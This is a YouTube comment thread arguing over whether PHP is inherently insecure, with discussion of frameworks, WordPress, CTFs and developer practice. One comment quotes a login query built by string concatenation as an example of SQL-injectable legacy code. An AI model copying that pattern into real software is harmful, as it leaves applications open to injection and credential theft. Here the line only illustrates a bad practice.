But its tooling is quite lacking, especially in vscode, and for a language that (now) has (basic) types built in beside phpdoc, it sure isn't benefiting from them as much as something like typescript does. I've also had to setup phpstan beside intellephense to lint the code, and both of those don't agree on which methods exist on which classes, and it's quite a mess.
Some things can be quite annoying as well. Like for example, the built in session authentication will not set sameSite to none because it's overridden by some package. Or setting up uuids for all tables requires too much of a workaround. Or the fact that multi table token authentication almost killed me to implement, and I still don't know how to make sense of the way it works since there are several ways to handle auth and it isn't clear in the docs how it all works.
A great frameworks, but there's also something to be said for a minimal do-it-yourself approach.
(Disclaimer: I'm not through the whole video yet.)
PHP is used pretty often in CTF's showing vulnerabilities. That may be one reason people think it's more vulnerable. Also to the point if most people are trained on one language's exploits.. Doesn't that mean that language is more likely to be exploited, making it... more vulnerable...
From what I know of CTFs. Usually the PHP vulnerabilities are ones that you could run into any other language with. It's just easier to execute and showcase in PHP.
Things such a serialization/unserialization, rce via shell injection due to the code taking unsanitized user input and slapping it into an exec() statement, sql injection via unsanitized user input.
PHP allows easy access to these foot guns. But you have to go out of your way to actually put bullets into the guns. I.E. take untrusted user input and put it into something that it should never be put into under any circumstance.
As such, no. Because it is not a PHP specific thing you're exploiting. But rather intentionally poorly written code that you are exploiting. It does not make anyone else's PHP instance more or less vulnerable. You are chasing after a concept in the ctfs. Not something specific to PHP. Node can do serialization/deserialzation of objects. You can shell inject or sql inject in python.
I remember about 11 years ago when I discovered PHP and I was mesmerised by how easy it was to develop dynamic web applications by just pasting some PHP code in the HTML, which was a breath of fresh air compared to Java at the time. Even back then the topic of "PHP is vulnerable" was quite popular, but I agree that it's the devs who make vulnerabilities, not the language.
In my time 90% of the issues were MySQL related because for whatever reason, most devs didn't use prepared statements even though every guide only explained MySQL connections with prapared statements. Really weird.
I think it's also part of the language design, programming conventions and patterns back then. As stated in the blog, back then, the zeitgeist leaned more onto the ease of use and approachability towards new developers (PHP, Java, JS, VisualBasic, etc.), not with safety and correctness we see highlighted a lot nowadays.
I wish we'd prefer the term unsecure over insecure. Unsecure definitely means a security risk, and not that the language has confidence and self-esteem issues.
unsecure means the application wasn’t designed to be secure, insecure means it has flaws despite intending to be secure
I am a professional web dev and we use php 8.2 ... it's almost as if you're writing C# or Java when you use strict typing (literally a php feature these days)
PHP has had a major glow up over the past decade or so
PHP is extremely insecure. I have seen thousands of hacked websites and thousands of vulnerabilities that should not exist.
I believe a language/framework is supposed to provide safety nets from common pitfalls.
Few examples:
in_array is not reliable upto 7.4
Most xss vulnerabilities are there because PHP does not escape things by default like erb in rails for example.
And 100 other reasons...
PHP is the Nickleback of programming languages
As a pentester, I've found vulnerabilities in PHP applications at a higher rate than other languages.
Which does not say anything about PHP but rather about the PHP developers who most likely use vanilla PHP and have no idea what they are doing. (Also as mentioned in the video, most websites run on PHP so obviously most vulnerable websites will also be written in PHP)
Probably testing legacy code
"You can't tell it's PHP code unless you see the extension." IDK what he means by that, but the dollar signs in front of all the variables is a pretty good sign I'm in PHP-land. That or Bash, and I'm not sure which is worse.
Also, "only a bad craftsman blames his tools" is just factually untrue. Only a bad craftsman blames his tools _for bad work,_ sure, but good craftsmen will 100% say their tools are bad and blame bad tools for slow and frustrating work. Bad tools are bad tools, and anyone who says "only a bad craftsman blames his tools" are bean counters/cheapskates/managers/old farts who have never used the right tools in the first place and probably don't work anymore (or worse, they've never even done the work in the first place), so they need to shut up and go home. Yes, I'm salty about this, I've heard it far too often back when I was in carpentry. Mostly from old farts who would lead every sentence with "back in my day" when "my day" precluded the existence of hydraulic machinery and widespread electricity.
Back in my day, Windows was a pane installation company.
@@TJackson736 now it's just a pain installation company.
My full stack class in college did 2-4 weeks in php. I thought it was a great introduction. Way less complicated than the end of the class that introduced “The Frameworks”. Seems like a straight forward approach to doing complicated things. I did however not like the global state nature of it. Seemed short sighted.
The language evolved from a toy technology that some guy used to develop his on home page (Personal Home Page). There are a few things that are short sighted due to this legacy.
Indeed you have global state because everything is run in context of one request, so that request is your whole "world". But I don't think that's an issue really.
If you mean global variables and other stuff which is practically global (service containers in frameworks etc) then it's optional and mostly discouraged. Still, you can do a ton of weird stuff in PHP and make extremely hard to understand code.
As a full time php dev, I can say it is an okay language. Security is no issue and the language has become much more developer friendly and oop-rich since PHP 7.0 release in 2015. I still would not generally recommend the language, because it is only useful for backend. A lot of languages can do backend, and at the same time be used as command tools, frontend and non-web related stuff.
One of my major issues with PHP is that it's a script language. It runs the script then stops. That's great for simple websites, but the moment you need to do something like keeping track of the amount of requests you're doing for rate limiting, you need something external to keep track of it.
With any other language that doesn't stop running once a request has been processed, that problem is fairly trivial. While it can obviously be trivial in PHP as well, there's just a lot more to it.
I think it's really nice because of the simplicity and PHP 8.2 has introduced some really nice toys to play with, but I'd still pick most other languages over it.
php can be used for non “web stuff”
it can, but it sucks there@@aiamfree
@@CottidaeSEA I'd argue that if you're rate limiting you need something external to keep up with it anyway. Companies are going to ask why they're being rate limited, etc.
Not only that, in the case of a crash/reboot you'd ideally want your limits to be cached & reloaded upon reboot.
@@Microtardz That could be done through a database. Also, the throttling isn't enforced in our system, it's adhered to, the external system has a request limit so we need to ensure we don't break it. As such, throttling can be necessary and in certain cases with fine-grained control if some requests are more important than others.
All of which could've been done through PHP and a database if it didn't shut down after request completion.
There is stuff like OpenSwoole which actually keeps everything running, but that also requires a fundamental change to session management.
I would say PHP I’d vulnerable because there are 7800+ CVEs against PHP, where Rails has 193. In both cases, these are applications built on the language.
Given Github and Spotify are Rails applications and Spotify handles 10% of e-commerce during Xmas, they must be secure.
Did you mean shopify?
Case in point, comparing a language with a framework.
Full Stack Laravel Dev pays well.
JS, PHP, Python all suck because they're scripting languages.
there worst feature is lots of outdated advice.
Magic quotes were removed in PHP 5.4, but 0 is still equal to "on".
bro if you thought early php was wacky let me tell you about this language called JavaScript
@@furycorp In JavaScript, 0 != "on", but a 1000+ line chess program does get unwieldy with implicit types.
I'm really wondering why you are trashing Joomla here. From the myriad of PHP CMS, Joomla probably is the most solid one out there. Especially comparing to the "market leader"...
Good joke. Joomla.....lol Here's another joke...Drupal.
@@complexity5545 do you have arguments?
I don't mean that sarcastically. Joomla has flaws, but the flaws I mean are rather minor and from past discussions it always turned out that people's opinions were formed by experiences from 15 years ago, while they always were astonished by what joomla does, especially compared to WordPress.
Back in the day, PHP\'s brilliant ideas on how to secure applications would instill me with confidence. \"There\'s no way these guys don\'t know what they\'re doing\", I\'d think.
00:37 i think from that $_GET can contain array values (from query string like "a[]=1&a[]=2") but php author assumed that values can only be strings
there is no mention of syntax like "a[]=1&a[]=2" in $_GET documentation btw
edit: there is but in "Variables From External Sources" page
The page about $_GET is in line with all other pages about superglobals, explaining their general content. GET, POST and REQUEST all link to "Variables from external sources", where the general concept of receiving data is explained (no use to maintain copies of that on all three previous pages if you can link to a "see also" page instead), and has both an example and a link to the FAQ page where this topic is also discussed.
It is admittedly a challenge to find the correct search terms to find the page you need explaining the thing you struggle with - the PHP documentation is still quite good.
If I had a $ for every time prime said PHP...I'd have a PHP file
10:00 dr disrespect = the primeagen confirmed
What a great summary at the end ❤
The php hammer is definitely a murder device
Zizek’s subconscious unknown knowns on dev stream
2023 vibe shift is crazy
PHP encourages writing insecure code by its very design. And the article pretty much says "yeah, so there are foot guns lying around, but you're not necessarily forced to use them". Well, my brother in Ch, if they are lying around, someone's going to use them. They cannot be removed precisely for the reason that someone IS actually using them. If these were simply legacy features nobody uses, they would have been deprecated by now and removed.
PHP is great. 90% all of those who complain about it's vulnerability never touched it.
People complain about other things once they've touched it though.
I complain because it powers Wordpress and without exception every WP site ive ever interacted with in the last 15 years seems to suck.
@@CamembertDave You don't touch PHP, PHP touches you.
I lot of them used it 10+ years ago and they don't realise that things has happened since then.
And thank God.
I am in the position to know to that a lot of less experience devs write important code. PHP suffers from bad press, I get that, but that doesn't change the fact that when you go to learn it you are essentially taught to raw dog php, at least that was the case for me. What PHP needs, is a wave of new up-to-date tutorials of how to write it properly. No, setting up WordPress is not a PHP tutorial and most people get it wrong.
@ProgramWithGio has a great series "Learn PHP the right way" that really does teach fundamentals and doing things correctly.
@@sadaros95 we need more of that.
Laracasts had their 10year anniversary this year. Best way to learn php since day 1
@@sadaros95Yes, Im actually going thru that as well as Laracast
What drove me away from PHP, really was how laser focus is on web development (maybe this has changed, please correct me if I'm wrong), this not a bad thing specially today, but i prefer languages with a wider use cases, by the way when i saw Laravel for the first time i was mind blown, such a good framework, every need of web development under the sun is probably implemented and well maintained on that framework
Ok, I need to counter the "a poor worker blames his tools" point from the article. The point of that saying isn't that bad tools don't exist, or that a good worker will be able to do good things with bad tools - it's that a good worker will ensure they have appropriate tools.
In this context, that means the proverbial good worker will try out PHP, see the problems, then find something better, while the proverbial bad worker will try out PHP, see the problems, then just keep using it anyway because they're too lazy to learn a new tool, probably ending up in denial about it and making cope-posts online about how all the PHP hate is unjustified.
Or maybe PHP isn't a bad tool. Either way, don't use that saying as a counter to criticism of a tool, because it's not.
I am toying with the idea of writing a full blog post about this because this argument comes up over and over.
It drives me nuts when people say stuff like "well, all languages have flaws"... quietly disregarding the fact that PHP has more/bigger flaws. It leads to this implication that there is no such thing as quality in programming languages, which is just not true. The very fact that each release to a language adds/deprecates features suggests that they want to move closer to perceived perfection.
TLDR your comment is spot on.
Ding ding ding!
Learn the best security practices from the beginning when handling databases with PHP and you're pretty much good. PHP is up to snuff when it comes to security these days. Really have had zero problems utilizing AWS EC2 (running LAMP stack) + Secret manager. Shits pretty secure, would recommend.
It’s even nicer that we don’t have to ask Stack Overflow or Reddit our questions anymore, since none of those people are capable of contributing to the benefit of themselves or humanity, anyway. ChatGPT understands PHP infinitely better than anyone on literally any modern forum just about ever.
Can’t see one nearly invisible error? Just ask Chat and the fix is nearly immediate on the first question. T_T
Thanks to the sheer amount of knowledge on the Inter et about PHP, chat GPT is indeed the best developer 😂
@@keremardicli4013 ALTHOUGH, it is rough around the edges on new PHP releases. Otherwise it is awesome! ^_^
Wait wtf was the part where the like button ran some animation when Prime said "press the like button" at 0:06?
you answered your own question "when prime said press the like button"
One of my favorite things with .htaccess files was giving PHP pages weird extensions and URLS. Miss those days...
0:16 yes because hakluke is a security person, so he hears this alot in security circles.
PHP itself isn't *that* insecure--but the devs who use it certainly are😁
13:45 No, it isn't the same thing.
Uninformed just means that somebody doesn't know about something.
Ignorant is worse, people who are ignorant about some things actively don't want to know about it and refuse to change their opinion even if faced with the contrary.
"Unknown knowns" is one of the most interesting ways I've heard of understanding cultural bias.
My professor almost flanked my FYP because I use Laravel, cuz PHP is insecure………. I explain to him how SSR and the framework have gates to stop the known vulnerabilities he noted. And he still wanted to flank me, even though the main code bits are not in the web site of things, it just for me to host the application…
The PHP interpreter is implemented in C.
That's all you need to know.
lol I just got put on a project to unravel some legacy code that is in ASP 😂
I am always here for the PHP content
Love that Article, My thoughts exactly.
The only way, I see Raw PHP being vulnerable is by negligence. PHP is not strongly typed so if you don't typecheck or typecast your inputs, or forget to sanitize anything, your Application becomes vulnerable. A PHP program is only as good, as the programmer writing it.
That example takes an unsanitized input "$_GET" and pumps it straight into an unsanitized output "echo" . What do these people, complainging about security, expect? PHP does what you tell it to do.
It's the same as with HTMX and people complaining about it making XSS possible.
I recall reading somewhere an analogy of PHP developers being like carpenters with odd tools making misshapen houses and yelling at you because when you open the front door and the back wall falls over, as if it's your fault and not theirs for making a shit house.
That's you.
Good tools make The Right Thing easy and the default, and The Wrong Thing hard, if not impossible. PHP does the exact opposite (and to be fair, in a lot of ways, so does JS), which you've so neatly demonstrated, which is why it gets the ire that it does.
@@BloodEyePact Uhh getting, personal already.
I don't yell at my clients if something breaks. I simply fix it.
You don't need PHP to create a garbage System. To stay with your analogy, If you have multiple carpenters work on the same piece of carpentry, but each one can only work if they have the specific tools, they are used to, then things get crowded in the workshop quickly.
I had to work on a Node project once that used Bootstrap, PicoCSS, and Tailwind all glued together with some custom CSS,
All because each previous dev was conviced, his/her favorite CSS Framework is "The thing" that will make things easier and better, but then they failed to adapt, what was already there to their "easier to use" framework.
Keep it simple. You don't need a Hammer factory if all you want to do is put a nail in the Wall.
@@AScribblingTurtle Don't misunderstand, I'm not claiming you yell at your clients, I'm pointing out that you are blaming PHP developers for using the common default way of doing things and those turn out to be extremely dangerous.
PHP is not made any better by the fact that you can create garbage with anything, the issue remains that it makes it easy to make garbage, and hard to make something good, because every feature requires complex, specific boilerplate to make it work the way it ought to have worked in the first place, and the way most people will think it works until they find out the hard way.
Its complexity is not the issue at hand, though its certainly not its strong suit, just take a look at the size of the "standard" library of thousands of functions with extremely specific behaviors and use cases.
Finally, comparing PHP to browser languages is a bad comparison. Browsers support HTML, CSS and JS, so you're stuck with them unless you want to venture into WASM. PHP is server side, you made a conscious choice to use garbage. The choice to use PHP over just about any other language for new projects is negligence.
@@BloodEyePact Many PHP "standard" features stem from core extensions, that you can install or uninstall as you please, to save on loading times, etc. At least they are a standardized source. What do Node, Go and Rust have for example? A package ecosystem, that is filled with dozens of packages, that do the same thing. Some of which seem to work as intended until you hit an edgecase and find out the hard way, that they don't.
(And before you mention it. I'm not a huge fan of composer, either. It just brings the flaws of a dependency-based package system like NPM to a language that does not need them. IMO)
I agree with your sentiment about complexity not being PHP's strong suit.
Use the right tool, for the right job. You don't use PHP if you need highly responsive applications.
Just as you don't hammer a nail with a Screwdriver.
And finally, if I can't compare the structure of a Client- to a Server application, let's take a Server-side Example instead.
A few years back I had to work on a Node - Server, that used the 'mongodb', 'mongoose', and 'mongojs' packages all to connect to the same MongoDB, within the same project.
It is easy to create garbage in any language. The Handholding that many younger Devs expect a language to do is ridiculous. The goal of the software is UX, not DX. PHP is a scripting language.
All that Handholding costs valuable running time on EVERY call, just so the dev doesn't have to think ONCE about what he/she writes.
You say it should work like people "think" it does?
What happened to "learning your tools"?
Finding out "the hard way", that something does not work is called learning.
"Uhhh, I don't want to learn, I went through a 2 Week bootcamp and now I just want to write code I think is correct and grab a quick paycheck. memememe."
@@BloodEyePact nothing really comes close to PHP when it comes to shipping a server side solution. Most of the "problematic defaults" have been addressed for about 10 years. If you're stuck in that time.. that's your problem.
Other "pro" languages like C/C++ gives you an even bigger gun to shoot your foot with. So using that as an argument doesn't really make sense.
`real_escape_string` is saying all you need to know
Gotta switch to php to buy my dream lambo i guess
Sometimes it seems like JS is the kid everybody is talking about how great it is while it tries to hide its flaws while PHP is just doing its thing in the background.
My friend works at a security company that probes for the various technologies used by vendors. Insecure and out of date PHP applications are still the majority of insecure and out of date applications out there.
You said it right there with "insecure and out of date". Its longevity means there are apps that run but no dev has touched them in forever. Similar story with many Windows exe's. Nothing to do with PHP IMHO other than its been around a long time and happens to power more sites on the web than anything else.
A woman once told me she thought I was insecure. I had to terminate her process.
I know it's (old?) php when the page I'm visiting is displaying an error message telling me the database is down.
Infosec guy here.
PHP is typically considered insecure not because it's a bad language or insecure because of libraries or anything like that.
Generally it's the same as any other language, but PHP is generally more annoying to update to newer versions.
Maintaining php is very annoying and often a nominal upgrade means a ton of work in testing.
There are managed PHP hosts and deprecation warnings are logged before features like magic quotes are removed in the next version. Tests should be automated anyway, because the website probably changes more often than there are mandatory upgrades to a new backwards-incompatible version.
@@CTimmerman If you see "managed host" you can often think "shared host"
In shared hosting environments companies tend to maintain multiple servers with different versions of PHP on them and move applications to whichever server has the version they need. unfortunately most people dont maintain their apps and the servers with older versions end up full and the biggest resource hogs.
thankfully these days containerization is making that less a problem. GDPR made shared hosting mostly infeasible in the eu.
That said, it speaks to the fact that "hosted php" is a feature demonstrates the pain of maintaining php.
@@MrVampify It's not a pain, just a hassle similar to delivering your own pizza. People pay for convenience.
do you have an example? One of PHP's strongest and most annoying points is its backwards compatibility. In my previous job, we updated some legacy PHP5 code (which still had PHP4 syntax in some areas) all the way up to PHP 8.2 in about a month. No issues.
> PHP is generally more annoying to update to newer versions
Harder than what? Node? Updating javascript libraries is a nightmare, and you have to do it all the time because the entire javascript ecosystem is full of critical vulnerabilities every other week. I would know, I get the dependabot alerts for it.
Python? Python 2 to 3 was a literal nightmare.
Java? Oh god please lets not get into jar hell or war files.
ASP? Well you've got me there, I've never used it.
Honestly speaking, I can't think of the last time updating PHP was a pain. Largely because everything was already following best practices such as using typed equality instead of loose equality everywhere.
Going from 5.6 to 8.2 has been virtually painless over the years.
I think the problem stems more from educational content. Find me a file upload tutorial that doesn’t end up putting this new uploaded file into a /accessible/to/the/request/malicious.php
This doesn’t mean PHP is insecure, it is the implementation which a lot of the resource seems to derive from poor educational content and the same people not wanting to understand the same thing in a deeper context.
Frameworks have since made this much simpler by enforcing that public directory and ensuring storage paths are not accessible by URL but then most educational content will start telling you to symlink it to public…. Back at square one again
I started web dev with php and wordpress and making custom theme. I thought I was wizard for being able to do custom themes back then.
You would still be a wizard because nobody wants to touch WordPress with even a stick now days
@@Davidlavierino wonder i get so many wordpress offers
It's time for a sveltphp framework
It's not the language, it hardly ever is, it's the developer and the ecosystem that are the main problems. That's why most JS is so garbage, too many inexperienced devs writing rubbish while using trash packages.
PHP is a fine language these days, Laravel is pretty good... but then TurdPress still sticks around like a bad smell. TurdPress compounds poor code with a plugin ecosystem that is just the absolute worst.
"Lmao, php is so insecure and old". *5 minutes later* "Omg, react in the server, raw SQL in frontend is the future!!"
Just want to start freelancing and hope to be full time remote working from anywhere. PHP seems to be a solid choice.
Listening to the Oppenheimer Soundtrack while watching ThePrimaegen makes his videos so much more intense xD.
I used PHP professionally for several years, and while it HAS made huge leaps I still can't stand the language. As for it being insecure, IMO the existence of features like extract() and using PHP for templating DO make it easier to write certain types of vulnerabilities regardless of what framework you're using IF you use those features. Sure you can avoid using unsafe features and have high standards for your code, but there are some foot guns that exist in PHP that I haven't seen in any other language.
Still a developer problem, why do you blame a language and not yourself when writing unsafe code
PHP's security originated from it's ease. It was so easy, that bad programmers could throw together a website and think that it's perfect. PHP is an effective tool, I just hate using it.
I am always surprised that the only thing ppl know about PHP is laravel and lambo and mega god entities.
Php used to be absolute shit (version 3) - you has to tweak the out of the box php.ini turning off things like register globals.
And I still use perl. Not as a cgi. I use HTML::Mason and it let's you write perl the same way you do php.
Php devs are insecure, I think he forgot a word.
Why did the like button glow when you said to press it?
PHP + HTMX = Gold, but you will never know :)
That was a straw man argument. The argument has never been that the language was insecure, it is just that many of the applications written with PHP were insecure. 20 years later some of the apps have cleaned up their security, but that doesn’t change history.
20 years ago what web app were secure? Most of the terminology wasn't even invented back then 😂😂
Sorry php might be some god given tool but I still can't bring myself to use it.
Writing php feels just weird..
Imagine having builtin templating capabilities to embed HTML inside the language only to prohibit using it and instead rely on an external tool (e.g. blade) that has pseudophp syntax, is very limited and has to be built into actual PHP…
@ThePrimeTimeagen Why you always leave first and last letter while marking text? O_o
nailed the landing
Aren’t most issues from passing raw strings to the DB, not the language per-se?
Just don’t raw insert those stings in there, if you know what I mean.
Yes, but "SELECT * FROM users WHERE username =" . $username . " AND password =" . $password; was easy, so it was far too common.
@@BlazingMagpieyou are right but that was in 99, before devs transitioned to pdo, prepared statements, and ORMs
@@rcmnet *Competent devs. To this day I find injectable DB access because someone in the company wrote it decades ago and "if it works, don't touch it". Some senior devs write it like this to this day, or at least copy-paste it from "parts that work".
I know a security expert that codes exclusively in php...
My little noobie nerds! Because "ex-Googles" or any other "big techs" "Super Developers" and successful influencers, complain about PHP or any other language. It doesn't mean that they are right! Use the language of your choice. and just let them be influencers. At the end of the day, all that matters is if you did your job and earned the money for this job. With My respects!
the name is a known known, known unknown, unkno.. kno.. agen!
Yarn 1 is abandonware. Yarn 4 is pretty cool actually but it breaks ide support so nobody uses it.
Welcome to Costco magnumdingus
hmm, I need to make an updated lamp installer
Oh boy he really be spicy
Yeah last time i heard PHP it wasn't about how insecure it is 😅
full ack, but the more important thing: why exactly are you wearing headphones if you're the only one talking? 🤔
Because the audio playing from his speakers would feed back into his microphone
don't forget Drupal
We have a service built by a 3rd party in laravel php. Out of all our services, this gives us the most issues form our security scans. We have serveral services written in typescript and c# but it's our one service written in php that gives us the most issues. Maybe the developers used bad 3rd party packages, idk. But it gives me the impression that php is insecure without knowing much about the ecosystem of the language.
It's so powerful that it made your team think that toy code was professional software. Think about it.
Reading the author's tagline: "Dad, husband, hacker, musician"
A "hacker" is trying to convince us that PHP is safe and everyone should use it... 🤔
It does not matter if hes a hacker
I'm okay with programming languages being insecure as you have to start somewhere. Programmers work at the boundary between the unsafe computer and the safe user environment. The idea of "safe at all costs" is bullshit. Footguns are another story.
Most php folks praise Laravel, but Symfony is even better
When php runs 90% of the web in the 90"s, mosr of the vulnerabilities sgow up in php. And of those, how many WordPress sites had default admin settings it weak md5 passwords stored simply
The author of that post confused me. RAW PHP is insecure? and using a Framework will make it Secure? its not the problem of the Language then. it may be a problem on who is using it or how we or us use PHP. hehehe
i can see hes getting tired at this point
The one and only Fireship is a pleated pants andy
Most of the criticisms of PHP I hear are not about PHP itself but about WordPress.
@ThePrimeTime PHP Laravel coding stream WHEN?
If you were writing a web app from scratch today which language/ stack would you choose?
Depends on the requirements quite a bit.. But if I didn't need a lot of weird integrations I'd go with Haskell / IHP. If I need support for lots of corporatey stuff I'd go with F# / Falco (+ Fable).
Bootstrap + HTMX + Rust (Rocket) is what I'm currently trying out. Will probably use Postgres for the database.
100% PHP, but only if laravel and symfony did not exist.
In the best case, sure, it's probably safe. The problem is 90% of it happens to be in use on wordpress sites, which are known to be hilariously unsecure.
Wordpress is not insecure by default. It's "just" that it is *extremely easy* to make a theme or plugin with security vulnerabilities without even trying.
Yeah a blank page might be less of an issue, but anything worth securing won't be a factory install of wordpress, it will have dozens of plugins.@@zekicay
Even then, if you look at exploit trackers, there's a new core issue every few weeks. That's less than the daily ones related to plugins, but it's still really bad.
It's the WordPress dilemma.
They are reaching and marketing towards a non-technical audience, therefore, they have to simplify and abstract away a lot of the stuff a newcomer might find difficult. A lot of that code kinda becomes ugly fast.
@@oserodal2702 Wordpress even after so many years, they haven't adopted or created any templating engine ( which gives you some guidelines ). Everything is in a PHP file if you want to, like 20 years ago (Queries, 'RAW' PHP, some CSS, some JS, some hooks, some PHP templating . Template overriding. You can do it with files, you can do it with hooks you can do it however. So, no structure. Defining a theme by a CSS file :'). A freaking JSON or YAML for defining a theme? Wordpress is still trying to escape the jQuery nightmare and bad written JS code from plugins. Wordpress database design sucks, or maybe I could say it does not have one. Either your write custom queries to optimise your website, OR you make almost 150-300 requests on page load when you have a lot of custom fields. Security is a non-existent subject - The abstract functional coding approach and all the folders that can be publicly accessed for Wordpress to work - it is just bad. wp/content/[plugins/**, themes/**, and so on]. When a lot of bad coded plugins are publicly available (the code - on you server) anyone can find exploits! Wordpress, unfortunately, powers up millions of websites, so its an easy target as a hot one too. It's a mess, and its a mess associated with PHP. I see developers make 'APPS' or using Wordpress as CMS for and API god dammit. But PHP 8+ is great @oserodal2702
I think PHP IS insecure, but not because reasons in article. PHP has some really bad functions that can do much more then almost everyone really needed. In later version some of that "features" can be disabled in config, but a lot of defaults are not great for security. Old API for system interactions or interops are archaic and booby-trapped.
skipped thru the entire video & only saw one line of actual code that didnt even illustatrate his point. it was literally just echo'ing the result of a concatenated string 😂
What music is he talking about? the subscriber music?